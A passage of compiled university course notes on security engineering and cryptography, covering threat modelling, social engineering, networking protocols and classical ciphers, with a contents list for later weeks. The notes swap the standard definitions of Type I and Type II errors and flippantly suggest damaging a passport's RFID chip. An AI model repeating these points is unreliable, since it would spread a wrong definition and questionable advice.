You are on page 1of 162

TextBook

Contents 1 . TextBook 2 . Week1/NiceNotes 1 . Introduction 2 . Why do we need cryptography? 3 . Thinking Like a Security Engineer - Creating a Threat Model 4 . Cryptographic Properties 5 . Cryptographic Algorithms 6 . Why is cryptography hard? 3 . Week2/NiceNotes 1 . Security Design How Can We Build A Secure System? 2 . Security Terminology 3 . Kerckhoff's Principle 4 . Security Through Obscurity 5 . Threat Model 6 . Safety 7 . Types of Attacks 8 . Type I/II Errors 9 . Networking 1 . OSI Model 2 . TCP/IP 1 . DNS 2 . ARP 10. Hubs Versus Switches 4 . Week3/NiceNotes 1 . Confidentiality with Secret Keys 1 . Classical Techniques 1 . Substitution and Transposition 2 . Confusion and Diffusion 2 . Caesar Cipher 3 . Vigenere Cipher 4 . Playfair Cipher 2 . Attack Methods 1 . Anatomy of an attack 2 . Technical Attacks 1 . Side Channel Attacks 2 . Substitution Man-In-The-Middle Attack 3 . Cryptanalytic Attack 3 . Sniffing 5 . Week4/NiceNotes 1 . Modern Symmetric Ciphers 2 . Keys 3 . Speed 4 . Categories 1 . The S-Box - Substitution Cipher 2 . The P-Box - Permutation Cipher 3 . Stream Ciphers 4 . Block Ciphers 1 . Initialization Vector (IV) 2 . Feistel Cipher 3 . Padding 4 . DES 5 . AES 5 . Attack Methods 1 . Brute Force 2 . Differential Cryptanalysis 3 . The F Function

1 . E (Expansion function) 2 . The subkey 4 . Side Channel Attacks 5 . Replay attack 6 . Network Scans and Attacks 1 . Port Scanning 2 . Denial of Service 3 . ICMP flood 4 . Teardrop attack 5 . Peer-to-peer attacks 6 . Permanent denial-of-service attacks 7 . Application level floods 8 . Nuke 7 . Distributed attack 1 . Reflected attack 2 . Spoofing 3 . Exploits 1 . Registers x86 CPU 2 . Stack Overview 3 . Writing an exploit 4 . Other Exploits 5 . Buffer Overflow Countermeasures 6 . Week5/NiceNotes 1 . Hashing 1 . Hash Function 2 . Properties of a Hash Function 3 . Examples of Hashing 1 . MD5 2 . SHA family 3 . Hashed Message Authentication Code (HMAC) 4 . Casting Nines 4 . Hash Function Attacks 1 . Preimage Attack 2 . Birthday Attack 3 . Length Extension Attack 4 . Prefix Attack 5 . Intrusion Detection System 1 . Types of IDS 2 . Problems with IDS 2 . Firewalls 3 . Types Of Firewall 1 . Network Layer Firewalls 2 . Application Layer Firewall 3 . Proxies 4 . Network Address Translation 4 . Getting Around Firewalls 5 . Common firewall attacks 1 . Port Scanning Attack 2 . Denial-of-Service (DoS) Attack 1 . ICMP ping flood 2 . TCP SYN flood 3 . SSH Brute-Force Attack 4 . Spoofing Attack 1 . IP Address Spoofing 2 . DNS Cache Spoofing 5 . Christmas Tree Packets Attack 6 . Iptables 1 . General iptables concepts 2 . Commonly used targets (actions) 3 . General Iptables Switches 4 . Usage Examples 5 . Advanced Iptables Concepts 1 . Match Extensions 1 . Limit Module

2 . Recent Module 6 . Glossary 7 . Week6/NiceNotes 1 . Confidentiality with Public Keys 1 . Public Key Cryptography 2 . Types of Public Key Cryptography 3 . Public Key Cryptography in Practise 1 . Generating the Key 2 . Encrypting a Message 3 . Using Digital Signatures 4 . Diffie-Hellman Key Predistribution Scheme 4 . Public Key Encryption 1 . Merkle 2 . Diffie-Hellman 3 . RSA 5 . Digital Signatures 2 . Rootkits 1 . Classification 2 . Rootkit Lifecycle 1 . Installation 2 . Hiding 3 . Detection 4 . Removing 5 . Preventing 6 . Damage 3 . Tools for Rootkit Lab 1 . lsof 2. ps 3 . netstat 4 . top 5 . grep 6 . netcat 8 . Week7/NiceNotes 1 . Engineering Security 2 . PKI + SSL 1 . Public Key Infrastructure (PKI) 1 . Purpose 2 . Advantages 3 . Disadvantages 2 . PKI Architecture 3 . Tunneling 1 . What is Tunneling? 2 . How does encapsulation work for Tunneling? 3 . Why Tunneling? 4 . Common ways of Tunneling 5 . Stream vs. Datagram tunneling 6 . Tunneling Protocols 7 . Pros and cons of tunneling 8 . HTTP Tunneling 9 . SSH Tunnelling 10. Virtual Private Network (VPN) 11. IP Security (IPSec) 12. Transport Layer Security (TLS) / Secure Socket Layer (SSL) 9 . Week8/NiceNotes 1 . Risk 1 . What is Risk? 2 . Terminology 3 . Measuring Risk: 4 . Risk as a Cycle: 5 . Risk vs Uncertainty: 6 . Dealing with Risk 7 . Risk Analysis & Management: 8 . PKI: 2 . Protocol

1 . What is a protocol? 2 . Secret splitting: 3 . Cryptographic Protocols: 3 . Attacks on Cryptographic Protocols 4 . Cross-site Scripting (XSS) 1 . Server-side scripting 2 . Client-side scripting 3 . The Scripting Problem 4 . Cross-site scripting 5 . Type Of XSS Attacks 1 . Non-Persistent 2 . Persistent 6 . Defence Against XSS Attacks 1 . Server Defence 1 . Escaping 2 . Filtering 3 . Input Validation 4 . Eliminating Scripts 5 . Cookie Security 2 . User Defense 10. Week9/NiceNotes 1 . Threats 1 . Security Engineering Guideline 1 . Assets 2 . Example: Listing the assets for a home 3 . Example: Listing the assets for an ISP 2 . Threat Models 1 . Common Threat Classes 2 . Errors and Failures 3 . What happens when the red light goes on for the first time? 4 . Change 5 . Threat trees 6 . Dealing with threats 7 . Zero Knowledge Protocol 2 . Honeypot 1 . What is a honeypot 2 . Types of honeypots 3 . Uses of Honeypots 4 . Discovery of Honeypots 11. Week11/NiceNotes 1 . What is it like to work as a penetration tester? 1 . Fuzzing 2 . Open source vs Closed source 3 . Universities are 5 years behind 4 . Miscellaneous 5 . Conclusion 2 . Protocols (continued) and policy 1 . Non-repudiation 2 . Protocols of Election: Properties 1 . Example: Requirements for a protocol 2 . Flaws in Australia Election 3 . Example 2 4 . More on repudiation 5 . Adobe updater 3 . Zero-Knowledge Protocol 1 . Transcript of protocol 2 . Modes of operation 3 . Example 4 . Example 4 . DRM 5 . What is Digital Rights Management 6 . DRM System 7 . A Case Study - FairPlay (Apple iTunes Store) 1 . How it works

2 . Attacks on FairPlay 8 . Problems with DRM 9 . When DRM Goes Bad 10. Attacks on DRM 1 . Attack Methods 11. E-Books, PDFs and Word Documents 12. Trusted Computing & PS3's 13. DVD CSS: Content Scramble System 1 . LFSR 2 . The CSS Algorithm 3 . Attacks on CSS 1 . Brute Force 2^40 2 . Known Plaintext 2^25 3 . Other Attacks 12. Week12/NiceNotes 1 . Security Funding 1 . SCARE the #$^& out of your boss 2 . Why should we Care About Privacy? 2 . PGP 3 . Stealing Your Data 4 . 3rd party tracking 1 . CSS HACK 2 . COOKIES 3 . Forum Vulnerability 4 . EXTERNAL HOSTING 5 . FLASH COOKIES 5 . Google 1 . IP Tracking 2 . Cookie Tracking 6 . Law

Week1/NiceNotes
Introduction
'Cryptography' origin in Latin: crypt - secret, graphia - writing. Science of designing secure communication methods. cryptanalysis - science of breaking such methods steganograpy - science of hiding communication cryptology - cryptography + cryptanalysis What is this subject about? 1. Security engineering. 2. Practical hands on stuff. 3. Systems.

Why do we need cryptography?


Many internet services that may require various privacy or security measure include: Banking Shopping Tax returns Government Military Student records

Privacy is a crucial issue in many of these applications Security is to make sure that nosy people cannot read or secretly modify messages intended for other recipients

Thinking Like a Security Engineer - Creating a Threat Model


"Think evil, act good!" - Adopt the mindset of an attacker. How secure is your house? How to steal Richard's bike? combination lock: cut chain, pop wheel, brute force, offer to take the bike, survey Richard entering the combination, guess the code - probably not random. As defenders we have selective blindness - Problem may be ill defined. People often do not sit down and analyse security needs, they will often buy the big, expensive, shiny security device. This is expensive, usually not very effective, and worse yet, oft leads to a false sense of security. Problems with security Completely secure system vs. usability - The aim is to make the system reasonably secure Expected properties - Reliance on the service that may be compromised Defending the wrong thing Defending against the wrong class of attacker Questions to ask when considering a security system What are they trying to defend against? What are the weakest links of this system? Are we relying on services that may be compromised? What types of attacks are likely affect these systems? What sort of people are attacking? What resources do they have? Is it worth defending? Classification of attackers may include: Hopeless individuals: kiddies - trend in the 90's Small criminal groups Large criminal groups organisations - Russia, Asia Highly funded organisations: governments In the last 5 years the number of attackers has increased and their ability has improved. Types of attacks social engineering technical attack force

Cryptographic Properties
1. Confidentiality: It should be possible to send a message without anyone apart from the intended recipient reading it. The goal is to ensure that the adversary does not see or obtain the data (message) M Example: A Message M could be a credit card number being sent by shopper Alice to server Bob and we want to ensure attackers don't learn it. 2. Authentication: It should be possible for the receiver of a message to ascertain its origin; an intruder should not be able to masquerade as someone else. The goal is to ensure that M really orignates with Alice and not someone else. Multi-facet authentication significant improves the security of a system. Generally speaking if an attacker can break one part of a factor, then they can break everything in that factor. Authentication types: What you have - identification Who you are - biometric: face recognition or thumb print recognition What you know - password 3. Integrity: It should be possible for the receiver of a message to verify that it has not been modified in transit; an intruder should not be able to substitute a false message for a legitimate one. Integrity: the goal is to ensure M has not been modified in transit Integrity prevents and Eve (eavesdropper) to: Modify "Charlie" to "Eve" - Authenticity Modify "$100" to "$1000" - Integrity 4. Non-repudiation: A sender should not be able to falsely deny later than he sent a message.

Cryptographic Algorithms

E: encryption algorithm D: decryption algorithm

Ke : encryption key Kd : decryption key

The best cryptographic algorithms are: standardized, implemented and public! Common Types public-key (assymmetric): Ke public, Kd secret private-key (symmetric): Ke = Kd secret

Sample application of the three cryptographic techniques for secure communication.

Design Concerns: How to define security goals? How to design E, D? How to gain conidence that E, D achieve our goals? A great number of designs try to produces algorithms without first asking What is the security goal? - This leads to algorithms that are complex, unclear and wrong.

Why is cryptography hard?


One cannot anticipate an adversary strategy in advance; number of possibilities is infinite. "Testing" is not possible in this setting. Additional References: Types of people: "hackers", "crackers", "black hats", "script kiddies": Hacker - The term "Hacker" may mean simply a person with mastery of computers; However the mass media most often uses "Hacker" as synonymous with a (usually criminal) computer intruder. In computer security, several subgroups with different attitudes and aims use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree. White hat - Breaks security for altruistic or at least non-malicious reasons. Grey hat - Hacker of ambiguous ethics and/or borderline legality, often frankly admitted. Blue Hat - Someone outside computer security consulting firms that are used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term ?BlueHat to represent a series of security briefing events.

Black Hat - Someone who subverts computer security without authorization or who uses technology (usually a computer or the Internet) for terrorism, vandalism (malicious destruction), credit card fraud, identity theft, intellectual property theft, or many other types of crime. This can mean taking control of a remote computer through a network, or software cracking. Script kiddie - Person, usually not an expert in computer security, who breaks into computer systems by using pre-packaged automated tools. Hacktivist - Hacker who utilizes technology to announce a political message. Web vandalism is not necessarily hacktivism.

Week2/NiceNotes
Security Design How Can We Build A Secure System?
You cannot build a completely secure system and have it be usable. If you make a really secure system but it is cumbersome, then users will gleefully attempt to circumvent the system. Security is a process, there's more to security than just building a secure system, it needs to be actively maintained/updated/operated, over time systems become decreasingly secure if left on their own. Attacker has to find a hole Defender has to protect all holes - don't over estimate how secure you are with overconfidence We need to think like a bad guy, like a scientist, always trying to disprove what we know. Trying to figure out what is wrong with a system, rather than trying to prove that it is correct/secure - doing that doesn't achieve anything for security, and only produces false peace of mind for those who build the 'secure' system. Make yourself less attractive as a target than those around you. Security bugs hide in complexity -> layering/abstraction approach reduces complexity, or at least compartmentalises it. How secure does a cipher need to be? How long does the message need to be secure? Key length - 56 bits is not enough We don't make something impossible to crack, we just make it a LOT of work Testing doesn't ensure the safety, but can give more confidence.

Security Terminology
Assets - things you're trying to protect Vulnerabilities - flaws in your security system that could be exploited (weaknesses) Threats: nature - the actions performed by an attacker source - the person/group who would be performing the attack (threat model)

Different parts of a security system: Prevention - Deter the burgular from breaking in (stickers on your windows) Detection - Become aware a break-in is occurring (alarm). A detection system is useless unless there is an appropriate response. Response - Do something about the intrusion (back-to-base system) Users - Usually the weakest link in a security system, can subvert the most advanced technical security measures Policy - Well-documented security policy, containing rules that staff will have to follow to keep the system secure. A small handbook is the only useful/realistic way to get people to obey a security policy. Environmental creep - Changes to the surrounding environment alter the security of our system, for example a wall that used to be very secure may become less secure when a neighbour builds an awning from which they could climb onto the wall. Chocolate security - Non multi-layered defence/security system. Similar to M&M's: hard on the outside, but soft on the inside. Thurston says that this is not always true, sometimes when you get the through the hard layer, they break your teeth, like peanut M&M's Fault Tolerance Design - Fault in one sub system doesn't bring down the whole system, only sub part of the system where the fault occurs.

Kerckhoff's Principle
A cryptosystem should be secure even if everything about the system, except the key, is public knowledge. The law was one of six design principles laid down by Kerckhoffs for military ciphers: 1. The system must be practically, if not mathematically, indecipherable; 2. It must not be required to be secret, and it must be able to fall into the hands of the enemy without inconvenience; 3. Its key must be communicable and retainable without the help of written notes, and changeable or modifiable at the will of the correspondents; 4. It must be applicable to telegraphic correspondence; 5. It must be portable, and its usage and function must not require the concourse of several people; 6. Finally, it is necessary, given the circumstances that command its application, that the system be easy to use, requiring neither mental strain nor the knowledge of a long series of rules to observe. Bruce Schneier ties it in with a belief that all security systems must be designed to fail as gracefully as possible. "Kerckhoffs' principle applies beyond codes and ciphers to security systems in general: every secret creates a potential failure point. Secrecy, in other words, is a prime cause of brittlenessand therefore something likely to make a system prone to catastrophic collapse. Conversely, openness provides ductility."

Security Through Obscurity


security through obscurity is security attained by hiding your weakness.

security through design is security attained by not having a weakness, designing the system correctly in the first place. The problem with security through obscurity is that it rarely works. It's too easy that the secret will leak eventually, and since there's no real security surrounding what is being protected the adversary will have very little trouble gaining unauthorised access once the secret is lost. One of Kerckhoff's principles for what makes a good cipher is very important: It must not be required to be secret, and it must be able to fall into the hands of the enemy without inconvenience.

Threat Model
A threat model may be used to identify, categorise, and prioritise types of threat. A threat model is not a bottom up thing (e.g. writing a shopping list of vulnerabilities). It is a top down thing. You need to take systematic approach to security What are they trying to defend against? What are the weakest links of this system? Are we relying on services that may be compromised? What types of attacks are likely affect these systems? What sort of people are attacking? What resources do they have? Is it worth defending? A generic threat modelling processing looks something like this: 1. 2. 3. 4. 5. 6. Identify security objectives Survey the application Decompose it Identify threats Rate the threats Identify vulnerabilities

Common Threat Classes: This is a non-comprehensive list of some of the common threat classes, not a thorough checklist. Your threat model should include (but is not limited to) the following classes of attacks Users Unintentional attacks (by frustrated or stupid users) Malicious attacks Attackers Casual attackers Does not target this victim specifically Attacks the victim while scanning many other targets

Determined attackers Targets the victim Has motive against the victim Tries to find vulnerabilities of the victim Funded attackers Like determined attackers, but also: Performs reconnaissance Hires people and purchases equipment to perform the attack Natural disasters / accidents Assets: Listing the assets is the important first step in any social engineering exercise. You can only effectively defend something if you know exactly what it is that you are defending. It is very important to make a comprehensive list of assets before you try to start to identify the risks and implement a security policy. Obvious Assets Valuable items Items of sentimental value The people in the house Sensitive data stored in the house The house itself Not-so-obvious Assets - often overlooked, and are often more important than the more obvious assets The sense of security (the feeling of safety within your house, which would be lost if there had been a break in) The inconvenience of getting your insured items back Example: Question An accountant has just resigned from his old partnership and is setting out on his own so he can spend more time with his family. He has set up a small home office and wants to connect it to his existing home broadband connection. He has a powerful desktop machine he will use for his work and is intending to buy a laptop and would like to have wireless access throughout the house. He has asked you to evaluate his security. Outline the threat model you will use. Answering the question: What are likely sources of attack? what are the likely assets to protect? Look at the context. Assets (brainstorming): Remember to prioritise these Client list Data Downtime (e.g. DoS attack) Infrastructure Family Identity (affect credibility) Most important asset is his business, next thing is his client data (if he loses he can't do business any more), next maybe infrastructure (may lose clients if downtime as they will go elsewhere). Sources of attack (brainstorming):

Mafia Out of space Wireless (number 2) (possible solution -> set up separate subnet for wireless and family) Non specific internet attacks e.g. script kiddies (number 3) Old partners Family (number 1) Neighbours Burglars (they might steal his laptop and he may lose critical data) Ordering: 1. His family are the number one source of attack. They wouldn't mean to cause problems but they are on the same network, they are going let viruses in, bypass firewalls so they can play interactive games online. The kid's friends might use computer. You should advise him to seperate the networks if possible, otherwise have a firewall with strict rules. 2. Wireless 3. Non specific internet attacks

Safety
We can tell if a system is unsafe but we can't tell if it is safe. Take for example a train network. If a train crashes we know the algorithm is incorrect but if they don't crash, then the algorithm might still be wrong we just haven't detected the problem yet. Think about security the same way we think about safety, we need to use engineering principles to make it safe to a standard. Testing doesn't guarantee safety, it gives us confidence that it is possibly safe.

Types of Attacks
There are three categories of attack: 1. Technical Attacks Disclosure of data Corruption of data Denial of service 2. Force 3. Social Engineering - Involves exploiting the weakness of people to achieve desired results. In most instaces, it is an individual from within the target organisation that will inadvertently aid the attacker in his pursuit 4. People are often the weakest point of a security system. Millions of dollars in encryption software, firewalls, padlocks, and a swipe card system can be bypassed by a single employee letting an attacker into the office. 5. Social Engineers prey on basic human instinct and their weaknesses - some of these include: Greed - Alarm bells ringing in peoples heads when they feel they are getting a better deal than other people - or getting something other people cannot. E.g. Nigerian Letter Scams. Helping People - Most of us won't have any qualms helping people 'swipe in' to labs after hours or opening the door from the inside. While this might not be a big issue with the CSE labs, the same mindset can see attackers gaining access to restricted areas in a company office. Apathy - ...who cares?

Authority - If you sound important and look like you know what you're doing, you can get away with just about anything. Reciprocation - If someone gives us something, there is often a strong inclination to return the favour - remarkably this is the case even when we do not ask for the initial favour. This natural rule of reciprocation often leads to performing a task even costlier than the original. 6. Why is it difficult to control? Social Engineering can be the most dangerous in large organisations in which its employees are relaxed about the information they relay to other 'insiders'. Large organisations have hundreds of employees, and it can be reasonably assumed that employees do not know all other employees by name/face/voice. However, in order for the company to run succesfully, these employees must often interact and engage in sharing important information. Thus when an employee is asked for information from a source which it assumes is from within the organisation - he/she has no problem in providing that information 7. State Attacks: TOC TOU Attack - (time of check, time of use attack) If there is a time delay between the time a client's credentials are checked, and the time this client is given access to a resource then this creates a vulnerability that may be exploited (e.g. after the operating system checks that a particular file should be deleted, it may possible for an attacker to swap this file for another before the delete command is executed). 8. RFID: Little circuits that broadcast information. Really neat in certain applications, but a double-edged sword. It is very unsecure - that's how it was designed! They do not belong in a passport, yet they are now being added. Why? People can walk past and steal your passport details. Doesn't sound fun. Suggest you hit your new passport with a hammer and if anyone asks why the RFID doesn't work, say: "Oh! Really? I must have sat on it." Similarly with access cards, incredibly easy for people to walk past and clone all your information. Very scary. Why isn't this more public? Because manufacturers are jerks (see: marketers, above). There is some evidence that Mythbusters were going to do a segment on this, but were gagged by lawyers. 1. Physical 2. Richard says: "You need to have physical security or you have nothing". E.g. it's not good having a state of the art firewall if you leave the door unlocked, and somebody can simply walk in and pick up your computer. But if your physical security is cumbersome, then there is a danger that you prevent legitimate users from accessing the resource. The better the physical security the more legitimate users will be locked out (this is an example of a type I/II error). Generally speaking, if you have really cumbersome security then you still may not be able to keep out the bad guys as the legitimate users get annoyed that they will work against the system. This may cause the security system to break down. 3. Other examples: Tailgating - someone swipes, and another person follows them in Keyboard - in a study each key was found to make a slightly different sound, it may be possible to analyse someone's typing. 4. Person who has physical access wins. 5. All physical security has type I and type II flaws 6. Don't rely on locks, nothing beats having a pair of eyes 7. Human element - so difficult to stop people allowing security to be broken e.g. tailgate

Type I/II Errors

When you are designing a study you want to minimise as many statistical errors as possible, but if you design the study to reduce type I errors, then you increase the number of type II errors (and vice versa). It depends on how we phrase a hypothesis as to whether an error is a type I or type II error, but generally speaking: Type I are false negatives These occur when we reach a negative conclusion when we should have reached a positive conclusion. Type II are false positives These occur when we reach a positive conclusion when we should have reached a negative conclusion. What are the chances that my statistics are incorrect?

An example of type I or type II errors: Let's say we have facial recognition software. We want the software to let through a door people who are suppose to be there (legitimate users) but to keep others out (attackers). If we set the facial recognition software such that a persons face must match exactly with the data stored in the systems, then there may be times when a legitimate user may be incorrectly refused entry (e.g. perhaps they have grown a beard). Let's call this a type I error. But if we then go back to the system and ease the match requirements for the system, then it may allow through attackers (who, for example, may look similar to a legitimate user). This would be a type II error. This example also demonstrates that if you try to reduce the type I errors then you may increase the chance of type II errors. We were interested in errors in judgment about Type II and Type I errors. An example: The Day The Earth Stood Still Basic Outline: Aliens land on earth. They are greeted by the military. The alien hands out a communication device which the soldiers take as a weapon. They shoot the alien. Alien perishes What are the Type I and II errors here? Action Kill Alien Alien: "Let's be friends" Type II Error Alien: "KILL-ALL-HUMANS" Yay!

Make Friends with Alien

Yay!

Type I Error

Generally, when talking about Type I and Type II errors in security, we refer to an increase in security, with the trade-off being a decrease in convenience. The more rigorous your system becomes, the more work the user has to do, and you have to be aware that the users may circumvent the security system just because it's too much trouble.

Networking
Computer Networking is the process of linking many computer users together to communicate Networking is often described with one of two models: OSI model - Open System Interconnection TCP/IP Internet Protocol Suite model. OSI model has 7 layers and is an abstract model of how computer networking works. The TCP/IP Internet Protocol Suite model has 4 or 5 layers (depending on where you look), and is fairly similar to then OSI model but it essentially rolls the application, presentation and session layer of the OSI model all into the Application layer. My understanding is that the OSI model is a theoretical model (usually taught in lectures) and the TCP/IP Internet Protocol Suite model is practically speaking what is used on the internet. OSI Model versus TCP/IP Internet Protocol Suite Model

Communication protocol: Specification of a procedure for transferring information. Different communication protocols can be at different levels of abstraction. When you send data over a wire from one person to another and there are only 2 people you don't need a protocol, but when your message is going out over a system where there are many people then we need an addressing system...this is what TCP/IP does.

OSI Model
OSI is broken down into seven layers: Application Layer, Presentation Layer, Session Layer, Transport Layer, Network Layer, Data Link Layer, and Physical Layer. When a person communicates to another person on a network the information

passes through these layers. It begins at the Application Layer, works its way through to the Physical Layer and then back up to the Application Layer

TCP/IP
TCP/IP consists of a stack of communication protocols for communicating across the interconnected physical networks. Whereas IP handles lower-level transmissions from computer to computer as a message makes its way across the Internet, TCP operates at a higher level, concerned only with the two end systems, for example a Web browser and a Web server. nables communication across any set of interconnected networks Hardware independent Universal connection End-to-end orientation Application Layer Transport Layer Internet Layer Network Interface Layer Hardware Layer Note: All the layers except for the hardware layer are conceptual Error detection and recover is performed at the higher layers Intelligence is placed in the hosts, not in the physical networks Protocol Layering Principle: The communication object received by layer n at the destination is exactly the same object sent by layer n at the source Advantage of layering: clarity Disadvantage of layering: efficiency In short, TCP/IP offers guaranteed transmission, error checking and error detecting, but not authenticity(it can be spoofed) or encryption(it can be sniffed). Application Layer Corresponds to the Session, Presentation, and Application Layers of the OSI Model Application programs access services across an internet Uses application software Example protocols: SMTP, Telnet, SSH Shell, FTP, HTTP Transport Layer Corresponds to the Transport Layer of the OSI Model Transmits messages from a client process to a server process Messages are converted into streams of packets Uses operating system software Uses ports for addressing packets Protocols: UDP, TCP Internet Layer Corresponds to the Network Layer of the OSI Model Transmits packets from a source host to a destination host Packets are encapsulated in datagrams Uses operating system software Uses IP addresses for addressing Protocols: IP, ICMP, routing protocols Network Interface Layer

Corresponds to the Data Link Layer of the OSI Model Transmits datagrams from a source network interface to a destination network interface Datagrams are encapsulated in frames Uses device driver software Uses physical addresses for addressing Protocols: ARP, RARP Hardware Layer Corresponds to the Physical Layer of the OSI Model Transmits communication signals over an SPN Uses network hardware Example: Encapsulation of application data descending through the protocol stack.

Two Internet hosts connected via two routers and the corresponding layers used at each hop.

IP: Primary protocol in the Internet Layer of the Internet Protocol Suite and has the task of delivering datagrams (packets) from the source host to the destination host solely based on its address. For this purpose the Internet Protocol defines addressing methods and structures for datagram encapsulation.

IP works by exchanging pieces of information called packets. A packet is a sequence of bytes and consists of a header followed by a body. The header describes the packet's destination and which routers on the Internet to use to pass the packet alonggenerally in the right directionuntil it arrives at its final destination. The body contains the data which IP is transmitting. When IP is transmitting data on behalf of TCP, the contents of the IP packet body is TCP data. Some examples of internet protocols and the layers at which they are found: DNS, TFTP, TLS/SSL, FTP, Gopher, HTTP, IMAP, IRC, NNTP, POP3, SIP, SMTP, SNMP, SSH, Telnet, Echo, RTP, PNRP, rlogin, ENRP TCP, UDP, DCCP, SCTP, IL, RUDP, RSVP IP (IPv4, IPv6) ICMP, IGMP, and ICMPv6 ARP, RARP, OSPF (IPv4/IPv6), IS-IS, NDP

Application Transport Internet Link

TCP: TCP provides a communication service at an intermediate level between an application program and the Internet Protocol (IP). That is, when an application program desires to send a large chunk of data across the Internet using IP, instead of breaking the data into IP-sized pieces and issuing a series of IP requests, the software can issue a single request to TCP and let TCP handle the IP details Provides reliable, ordered delivery of a stream of bytes from one program on one computer to another program on another computer. Besides the Web, other common applications of TCP include e-mail and file transfer. Among its management tasks, TCP controls message size, the rate at which messages are exchanged, and network traffic congestion.

About TCP: point-to-point: one sender, one receiver reliable, in-order byte stream: no message boundaries pipelined: TCP congestion and flow control and set window size send & receive buffers full duplex data: bi-directional data flow in same connection; MSS: maximum segment size, e.g.: 1460 bytes, 512 bytes connection-oriented: handshaking (exchange of control messages) between initial sender and receiver, state established before data exchange flow controlled: sender will not overwhelm receiver TCP socket identified by 4-tuple: source IP address source port number destination IP address destination port number

UDP - User Datagram Protocol UDP packet, header structure:

UDP packet, whole packet structure:

About UDP: no frills, bare bones Internet transport protocol best effort service, UDP segments may be: lost delivered out of order to application connectionless: no handshaking between UDP sender, receiver each UDP segment handled independently of others UDP does not guarantee reliability or ordering in the way that TCP does. Why is there a UDP? no connection establishment (which can add delay) simple: no connection state at sender, receiver small segment header no congestion control: UDP can blast away as fast as desired UDP is often used for the delivery of streaming multimedia applications UDP socket identified by 2-tuple: destination IP address destination port number When host receives UDP segment: checks destination port number in segment directs UDP segment to socket with that port number DHCP - Dynamic Host Configuration Protocol llows host to dynamically obtain its IP address from network server when it joins network Can renew its lease on address in use Allows reuse of addresses (only hold address while connected an on) Overview: host broadcasts DHCP discover message DHCP server responds with DHCP offer message host requests IP address: DHCP request message DHCP server sends address: DHCP ack message

How does network get subnet part of IP addr? It gets allocated portion of its provider ISPs address space ICMP

used by hosts & routers to communicate network-level information error reporting: unreachable host, network, port, protocol echo request/reply (used by ping) network-layer above IP: ICMP msessages carried in IP datagrams ICMP message: type, code plus first 8 bytes of IP datagram causing error. DNS Domain Name System (DNS): is a hierarchical naming system for computers, services, or any resource participating in the Internet. It associates various information with domain names assigned to such participants. Most importantly, it translates humanly meaningful domain names to the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices world-wide. People: many identifiers: TFN, name, passport num. Internet hosts: IP address (32 bit) - used for addressing datagrams e.g: 121.25.35.67 name, e.g., ww.yahoo.com - used by humans Domain Name System: distributed database implemented in hierarchy of many name servers application-layer protocol hosts and name servers communicate to resolve names (address/name translation) note: core Internet function, implemented as application-layer protocol complexity at networks edge DNS iterative query:

DNS recursive query:

DNS hybrid query:

ARP Address Resolution Protocol: In computer networking, the Address Resolution Protocol (ARP) is the method for finding a host's hardware address when only its Network Layer address is known. ARP is not an IP-only or Ethernet-only protocol; it can be used to resolve many different network-layer protocol addresses to hardware addresses, although, due to the overwhelming prevalence of IPv4 and Ethernet, ARP is primarily used to translate IP addresses to Ethernet MAC addresses MAC Addresses and ARP: 32-bit IP address: network-layer address used to get datagram to destination IP subnet MAC (or LAN or physical or Ethernet) address: function: get frame from one interface to another physically-connected interface (same network) 48 bit MAC address (for most LANs) burned in NIC ROM, also sometimes software settable LAN Addresses and ARP:

MAC address allocation administered by IEEE manufacturer buys portion of MAC address space (to assure uniqueness) analogy: MAC address: like Social Security Number IP address: like postal address MAC flat address _ portability can move LAN card from one LAN to another IP hierarchical address NOT portable address depends on IP subnet to which node is attached

Ethernet Frame:

Hubs Versus Switches


Ethernet - Part of the Physical Layer on the OSI model. It uses frames to transport information within a Local Area Network. Hubs - Stupid, they allow collisions, offer no privacy or security and can be made to crash one another by creating an infinite loop. Plug in and receive all. Switches - Slightly smarter than hubs. They don't forward on all ports and as such offer security and privacy protections. They are used in internal networks. Plug in and receive messages to you. Routers - Much smarter. They forward on specific ports according to an internal routing table and use a buffer to store messages when they receive faster than they can transmit(thus, they can still be dos-ed, just not as quickly). Routers are used as gateways to the outside world.

This is a basic image of a network routing scheme.

Week3/NiceNotes
Confidentiality with Secret Keys

Classical Techniques
Various techniques to make it more difficult to decrypt cipher: Multiple ciphers Different languages Rolling cyphers One-time pad (impossible to break) Increase granularity (block size), for instance using the Playfair cipher Non-deterministic ciphers have various possible outputs for a given input. For instance add extra characters to the alphabet and random choose which corresponding one to use when encoding. Breaks frequency analysis (sort of you can still break this once the text gets very large!) Double-enciphering - use a structure-breaking transformation between plaintext and ciphertext compression before encryption - reduces or destroys data redundancy watch for known-plaintext attacks: the header of a compressed file is well-known!! Substitution and Transposition Transposition: Transposition or permutation ciphers hide the message contents by rearranging the order of the letters. Substitution: Units of plaintext are substituted with ciphertext according to a regular system; the "units" may be single letters (the most common), pairs of letters, triplets of letters, mixtures of the above, and so forth. The receiver deciphers the text by performing an inverse substitution. monoalphabetic - only one substitution/ transposition is used, or polyalphabetic - where several substitutions/ transpositions are used The solution of a substitution cipher generally progresses through the following stages: Analysis of the cryptogram(s) 1. Preparation of a frequency table. 2. Search for repetitions. 3. Determination of the type of system used. 4. Preparation of a work sheet. 5. Preparation of individual alphabets (if more than one) 6. Tabulation of long repetitions and peculiar letter distributions. Classification of vowels and consonants by a study of: 1. Frequencies 2. Spacing 3. Letter combination 4. Repetitions Identification of letters. 1. Breaking in or wedge process 2. Verification of assumptions. 3. Filling in good values throughout messages 4. Recovery of new values to complete the solution. Reconstruction of the system. 1. Rebuilding the enciphering table. 2. Recovery of the key(s) used in the operation of the system 3. Recovery of the key or keyword(s) used to construct the alphabet sequences.

